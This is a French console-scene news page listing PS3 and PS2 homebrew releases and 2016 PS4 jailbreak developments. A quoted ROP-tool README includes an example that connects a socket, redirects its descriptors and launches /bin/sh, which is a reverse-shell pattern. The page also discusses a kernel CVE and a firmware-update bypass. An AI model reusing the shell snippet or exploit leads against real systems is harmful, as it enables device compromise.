Logic-Sunrise : actualités, téléchargements, releases, dossiers et tutoriaux

Aldo Vargas continue de faire vivre webMAN Mod, il nous propose de découvrir la toute nouvelle version v1.45.01 du célèbre plugin webMAN. Les améliorations et les corrections sont nombreuses, il ne s'est pas contenté de mettre à jour simplement le plug-in.    

 

 

 

 

    webMAN MOD 1.45.01 @aldostools aldostools released this 16 days ago · 15 commits to master since this release   :warning: if upgrading from webMAN 1.43 or lower, settings must be configured again in /setup.ps3!!!! :warning:   What's new   :new: New USER/ADMIN security mode: :new:   Added the new combo L2+R2+TRIANGLE to toggle USER/ADMIN mode (disabled by default) Several functions will be limited while the plugin is in USER mode, including: Access to /dev_blind, FTP server, ps3mapi, delete, copy, show IDPS, file manager, virtual pad... Added /admin.ps3?enable&pwd=<pwd> to change mode Added pwd=<pwd> parameter to the web commands: /setup.ps3, /install.ps3, /download.ps3, /restart.ps3, /shutdown.ps3, /browse.ps3 Added option to mute SND0.AT3 of mounted game when disc icon is selected on XMB :hear_no_evil:   Added option to prevent auto-power off on ftp, install, download (except on Lite edition) (in previous version the option was enabled through USB polling)   Added web command /md5.ps3/<file> to full edition.   Fixes   Fixed PSP games not mounted due fail copying icon :warning:   Fixed fan controller paused during PKG installation via combo   Fixed Remove SingStar Icon (thanks to bguerville)   Fixed option Remove SingStar Icon couldn't be changed   Fixed dup. games listing on full edition if remote net server is unavailable   Changes & improvements   Mounting from XMB now always close folders (even if autoplay is off) :rocket: (This option can be disabled unchecking PLAY DISC combo)   Some system combos now work only on XMB (e.g toggler cobra, rebug togglers) :video_game:   Fixed /net games not listed in Last Game list of File Manager   The LED on the console now always blink while game is mounting   Added 3 seconds timeout to ps3netsrv connections   Changes in other components:   Fixed crash still happening on ps3netsrv (Windows version) :zap: VSH Menu 1.12: Fixed not loading VSH menu after install a pkg from VSH menu's File manager  

 

 

  Téléchargement : webMAN Mod v1.45.01  

Le développeur PlayStation 4, eXtreme, nous propose de découvrir en vidéo la nouvelle version de son PS4 UI Mod Alpha qui passe en version 0.10.          Comme vous le savez, la modification de l'interface utilisateur est limité au seul firmware 1.76 pour le moment, au programme de cette "nouvelle" interface, il a changé encore quelques icônes, l'aspect visuel du HomeMenu, il a changé des textes (TV, Vidéo, Fonds d'écran, Internet), changé quelques chemins d'accès et d'autres tweaks.   Encore sous version alpha il cherche un moyen d'accéder directement à NPXS29998, NPXS29999 et NPXS20993 dans le menu Accueil.      Tout est là : extreme-modding.de  

L'un des développeurs les plus influents de la scène PS3, Aldo Vargas, dit Aldostools, nous propose de découvrir une de ses nouvelles versions d'IrisMan.   L'un des homebrews les plus populaires, IrisMan, est un manager de renom bénéficiant de fonctionnalités uniques, puisque dans cette nouvelle version, Aldostools a rajouté ni plus ni moins le support Mamba 3.x qui est une version spéciale du payload.   Cette version retravaillé a pour ambition d'écarter les limites entre Cobra et Mamba puisqu'elle donnerait le support des ISO PSP et PS2 au sein de Mamba. Aldo a effectué des changements sur les drivers, et aussi sur le support de Mamba en lui même vu la particularité de cette mouture.     

  IRISMAN v04.80.00 : Install Mamba 3.x (thanks to PS3ITA) Implemented PRX Mamba Loader into IRISMAN Added load Mamba through PRX Loader payload. Added support to load Mamba uncompressed. Added display of payload version in Global menu webMAN now is auto-loaded with IRISMAN (the path of the plugin is set in settings.ini) Added display of CPU/RSX temperatures in File Manager Fixed various issues listing games. Removed prxloader.self (not needed) Changed version to match latest supported CFW version (like in multiMAN)   Mamba 3.x supports everything in Cobra (PS3ISO, PSPISO, PS2ISO*, PSXISO, NETISO, NTFS, plugins, etc.). *PS2 requires the emus patched for Cobra (e.g. the ones found on Rebug or PRX Mamba Loader)?  

 

 

  Téléchargement : IrisMan 4.80 avec Mamba 3.x PSPISO PS2ISO   

Le développeur DeViL303 vient de mettre à jour son logiciel permettant de modifier le XBM de la PlayStation 3, XMBPD passe en v0.61.00.   Attention, cet homebrew se destine uniquement au custom firmware Rebug 4.80.1 REX, il est déconseillé de l'utiliser avec un autre CFW.   Au programme de cette nouvelle version, de nouvelles icônes, de nouvelles photos, de nouveaux paquets cosmétiques, des corrections de bugs ou encore de nouveaux fonds d'écran ainsi que la mise à jour WMM et de prepNTFS.                 XMBPD Update v0.61.00 now available to download from the XMB if you have this installed already. To update, go to the Game category > XMBM+ > XMB Package Downloader > XMBPD Setup > Update XMBPD > Then Reboot.?   Changes in v0.61.00: All Download Items now have individual icons.(see pics, I know they are squashed but its better than nothing right?) Added LOTS of new items to the Retro Section, Big thanks to @Phil for doing those and also for adding icons to them. Added a "Homebrew Games" category, Just one entry so far, Flappy Birds Family. I plan on adding more soon though. The Package Handling Settings and Style Settings no longer need to download any pkg to be changed, it is now done via local pkgs instead = much faster to change, and can be done offline. Added a few more packages. Few small cosmetic changes, to the note item, credits, category order etc. Fixed bug where the wallpaper settings would revert to default when updating or changing package settings. Updated the wMM and prepNTFS pkgs to the latest versions available right now.

 

 

  Téléchargement : XMBPD v0.61.00 / XMBM+ v0.24.005    

Dans désormais 11 jours, la PlayStation 4 Pro sera commercialisée officiellement, et nous pouvons dors et déjà découvrir quelques photos de packs qui sont livrés. C'est le 10 Novembre 2016 que Sony lancera officiellement la commercialisation, mais les premières consoles sont déjà livrées.   Quelques informations sont visibles : Support du HDR10, la confirmation que la PS4 Pro ne supporte pas les disques Blu-Ray 4K, que cela se fera via un upscalling, il s'agit d'un modèle Jet Black sous référence CUH2015B.                 

Le développeur DeViL303 nous propose de découvrir une nouvelle version de webMAN LaunchPad qui passe en v0.12. Comme vous le savez webMAN LaunchPad permet de créer des raccourcis vers 500 jeux dans une sorte de grille, et plusieurs fonctions peuvent être lancées à partir du XMB.    Après l' installation , tout se fait automatiquement vers vos titres préférés.         
  This is an XMB mod that allows for Shortcuts to your favourite games and WebMan functions to be easily accessible with large tiles. There a few neat things this can do that normal shortcuts cant, for example you set age limits on which functions/Games show up, so for example you can set it so for certain users some games wont show, and the Webman setup wont show.    WebMAN LaunchPAD v0.12 (Rebug 4.80 Only)   Small Changes: Changed message that appears when mounting a game or using a function to "Performing requested action..Please Wait.." Removed XMBPD from the installer as that is now separate. Changed XMB items title to "WebMAN Launchpad" for all languages. Added the wm_launchpad.xml in the same format as the one that WMM creates, just 3 functions at the top and local icons. Added local icons to installer incase XMBM+ isn't installed. Changed icon for installer so it matches item. DOWNLOAD   Note: You can delete the installer after you run it and select option 1. You will need it again if you want to uninstall Launchpad, so keep the pkg.

 

 

  Téléchargment : webMAN LaunchPad v0.12   

Voici une new assez importante, même si cette dernière ne concerne pas les users lambda de PS4 retails, on apprend sur le site PShax, qu' un certain José Coixão vient de publier une vidéo très intéressante d' un POC (proof of concept).

 

En effet, on voit dans cette vidéo le lancement d' un backup (Minecraft) sur une PS4 devkit en 1.76.

Attention pour ceux ne sachant pas ce qu' est une devkit, il s' agit d' une console de développeur qui en conséquence comporte beaucoup plus d' options et donne beaucoup plus de possibilités qu'une console du commerce dit retail (les nôtres).

 

 

 

 

Malheureusement cette manip (encore inconnue du publique) ne fonctionne QUE sur devkit, il ne sera donc pas possible de faire de même sur nos PS4 retails. Mais cela permet à la scène PS4 de mieux comprendre l'exécution et le fonctionnement des jeux afin de porter ceci sur nos chères PS4 retails.

 

Nous apprenons aussi sur Twitter que ce POC est fonctionnel sur devkit 1.76 activée, et qu' on attend le test de la "team chinoise ?" sur 3.55.

 

 

 

 

Cette vidéo arrive tout juste un jour après la publication du tuto de zecoxao sur le décryptage et le dump des UserModules PS4 (tuto ici).

 

Merci à Chronos pour l' info

 

 

 

 

 

Comme vous avez certainement vu récemment l'équipe de chinois de chez Chaitin tech a réussi à lancer Linux sur le firmware 4.01 de la PS4.

Ils n'ont pas releasé toutes leurs découvertes pour l'instant concernant cet exploit simplement un Github où ils donnent des pistes aux développeurs sur le ROP.

Ils apportent quand même une fois de plus leur pierre à l'édifice en contribuant au Github de Fail0verflow et à l’implémentation du Kexec system call qui est fait pour booter directement un kernel Linux sur l'OS de la ps4.

En effet avec leurs découvertes ils ont modifié les fichiers du Github pour permettre l’exécution de Linux sur les firmwares 3.55,4.00 et 4.01:

Vous trouverez toutes les modifications à cette adresse:

https://github.com/f...9735e2cf8907e1e

Ces informations et modifications ne seront utiles qu'aux développeurs.

Restons attentif aux prochains jours peut être que d'autres développeurs prendront le relai

Les développeurs de la scène PS2 s'activent une nouvelle fois pour démontrer que la scène de la console de deuxième génération de Sony est toujours vivante. Ce sont les développeurs krHACKen et Maximus32 qui nous proposent de découvrir de nouvelles versions de leur homebrews.   A commencer par krHACKen qui livre ID Dumper mais aussi SCEDoormat NoME. ID Dumper est un utilitaire qui va vous permettre de décharger ou dumper l'ID iLink, les clés CDVD et l'ID PS2HDD de votre console PS2.    

 

 

PS2 ID_Dumper A little PS2 ELF which was coded for the sole purpose of dumping the machine and iLink IDs, the CDVD keys (DNA$ and SUD), and the $ONY HDD ID. It also reads the entire MECHACON NVRAM...   The dumped data are saved as raw binaries to the USB drive.   To dump your PS2HDD ID, you need three $ONY drivers (dev9.irx, atad.irx and hdd.irx), NOT INCLUDED in this package. The download comes free of $ONY proprietary code.   How to use : 1) Copy the needed modules to the ID_DUMPER folder; 2) Copy the ID_DUMPER folder in the root of your FAT32 formatted USB device; 3) Run RUNME.ELF.​   Optional drivers in Pastie nbr 10951082​  

 

 

  Téléchargement : ID_DUMPER    

Ensuite le développeur nous offre le code source d'un très bon utilitaire nommé SCEDoormat NOME (émulation MECHACON) qui est un logiciel compatible  DMCA qui vous permet de convertir un ELF en fichier FELP, qui peut alors être exécuter à partir d'un disque dur. Le code source provient de la Release 3 sortie le 13 Avril 2015. 

 

 

 

 

 

  Hello,   I decided to share the src of my SCEDoormat (No ME Version) Release 3 proggy...   The code is quite messy and meh, although it compiles fine. Should not be difficult to port the tool to other operating systems, or add your program the ability to decipher the KRYPTO files and play LEGOs:playful:...   Regards.  

 

 

  Téléchargement : src_SCEDoormat3_NoME.zip     Enfin, c'est le développeur Maximus32 qui a publié PS2Linux v3.8, cette mis à jour intègre désormais de nombreux changements et des optimisations, comme par exemple une amélioration de la vitesse Ethernet ainsi que la possibilité de spoof sous MAC, l'arrivée du noyau 3.8 permet de se libérer du 2.6.     

 

 

  Ps2Linux v3.8 ​   The release is ready, at last .   New kernel features: - one network driver for FAT and SLIM, stable - ethernet MAC address spoofing - ethernet speed increased - new fast HDD DMA driver - 2.6.35.4 upgraded to 2.6.35.14 - 2.6 kernel has same features as 3.8 - ps2dev interface working on both kernels - sps2mod working on both kernels​   New usb stick features: - sps2mod modules included, use "sps2_load" to load them - sps2dev demo's included (dma_triangle, spky_bumpmap, sps2_triangle, tshower and vspeed) - some applications to do some tests like hdparm, iperf and bonnie++.​   Feature requests welcome: - Changes to the kernel config (like adding usb drivers or file systems) - Changes to buildroot (like applications, services)​

 

 

  Téléchargement : ps2linux3.8_v0.1.img.gz et ps2linux3.8_v0.2.img.gz  

Chose promise, chose due, le code qui permet l'exploit sous firmware 4.01 a été dévoilé, il s'agit d'un outil privé sous forme de code qui permet le jailbreak de la PlayStation 4.    

 

 

  PRO: PROgramming ROP like a PRO   This is a crappy tool used in our private PS4 jailbreak. Since some version, the internal browser is compiled WITHOUT jit support, and sys_jitshm_xxx seems to be disabled for unprivileged process. We have to write the kernel exploitation in ROP, like what has been done in HENKaku jailbreak.   Build   pip install git+https://github.com/chaitin/pro If you have modified the pro.g4 file, use the following commands to generate new lexer and parser.   cd pro/parse && antlr4 -no-listener -visitor -Dlanguage=Python2 pro.g4 Examples   toy {     {% include "gadgets.pro" %}     {% include "glibc.pro" %}     const AF_INET(2);     const SOCK_STREAM(1);     const IPPROTO_IP(0);     var fd;     socket(AF_INET, SOCK_STREAM, IPPROTO_IP);     func store_rdx_rax<libc, 0x0002e60c, "rdx,rax::">;     store_rdx_rax(&fd, undefined);     printf("socket fd = %d\n", fd);     array addr["\x02\x00\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"];     connect(fd, addr, 0x10);     {% for i in range(3): %}         dup2(fd, {{i}});     {% endfor %}     system("/bin/sh");     exit(1); } Usage   A BIG TODO. Just try and learn by yourself.   Quick Guide   All expressions should be evaluated during compilation, Const/Func should be initialized in declaration.   Func is initialized with . Base/Offset is used for relocation, Signature determines the calling convention of Func.   Array can be declared with size(Int) or directly initialized with its content(String).   For loop should be written in template script, it will be rendered before compilation. For more information, check Jinja2.

 

 

  Bien entendu, ce code et les exemples sont réservés aux développeurs.   Tout est là : chaitin/pro   Téléchargement : ROP Tool   

Le développeur Red-EyeX32 nous confirme que son bypass fonctionne, si vous êtes sous firmware 4.01 ne mettez pas à jour, vous pouvez bypasser pour profiter du 4.05 sans mettre à jour votre console.    Il semblerait que Sony n'est pas changé le chemin d'accès sur ses serveurs, seulement le passphrase, et en conséquence, son PSProxy fonctionne parfaitement.            Téléchargement : PSProxy 4.00  

Nous apprenons une fois de plus sur le forum de Wololo, quelques infos intéressantes à propos du hack 4.01 de la team chinoise lors du concours GeekPwn.

 

Après que les membres de la team est annoncés qu' ils révèleraient les failles de leur exploit à Sony, d' autres devs se sont empresser de chercher comment ce dernier à été mis en place.

 

 

 

 

Avec les premières recherches, certaines personnes auraient eu accès à quelques infos sur l'exploit FreeBSD de la team Taichin Tech.L'exploit kernel de ce hack 4.01, reposerait apparemment sur une faille CVE (CVE-2016-1885) qui a été révélé en Avril. Il semblerait qu' elle n' ai pas été correctement patché et qu' elle serait une des failles que les hackers Taichin Tech auraient utilisés pour accéder au système interne de la PS4.

 

The argument validation in r296956 was not enough to close all possible overflows in sysarch(2)

 

 

 

 

Bien sur, tout ceci n' est pour l'instant pas encore prouvé, mais les choses avancent dans le bon sens, de plus FreeBSD étant open-source, les détails de la correction de cette faille kernel pourront aidés nos hackers à mieux comprendre comment cette dernière fonctionne.

Naturellement toutes ces infos, sont pour nous simple users, incompréhensibles, mais ne doutons pas que les personnes qualifiées seront quoi en faire et s' en servis comme il le faut.

Ce qui a déjà commencé d' après certains hackers.

 

Que reste-t-il en théorie pour un jailbreak des PS4 >1.76?

 

En 1.76, les choses sont déjà faites, nous possédons un exploit webkit et un exploit kernel, pour le reste des PS4 donc >1.76, en théorie, je le répète, nous possédons un exploit webkit en 3.55 (la même faille d' henkaku) par contre il nous manquait juste un exploit kernel afin d' être au même niveau que les PS4 en 1.76, d' où l' importance de cette faille CVE (CVE-2016-1885).

 

Donc en conclusion, les PS4 en 3.55 et moins ont de grandes chances de rejoindre les PS4 en 1.76 au niveau possibilité de Hack (Linux, Menu Debug, etc...).

Pourquoi 3.55 et moins et non 4.01 et moins, tout simplement car nous ne possédons pas la faille webkit utilisé par les chinois et cette dernière sera (a été?) révélé à Sony, elle sera donc bloqué si ce n'est pas déjà le cas avec le 4.05.

 

SpecterDev confirme sur la shootbox de pshax ce qui vient d'être écrit sur cette news:

 

 

Nous vous conseillons, si le hack PS4 vous intéresse, de ne pas mettre à jour vos consoles au dessus de 3.55 afin de profiter de la faille webkit et ainsi du futur exploit kernel.

Pour ceux en 4.00/4.01il vous faudra être patient et ne pas mettre à jour en 4.05 afin de ne pas perdre la faille webkit toujours présente dans ces 2 firmwares mais non connue encore de la scène (en théorie).

 

Liens concernant cette fameuse faille kernel:

 

- FreeBSD security Advisorie

- CVE-2016-1885

- L'exploit kernel avec les corrections apportés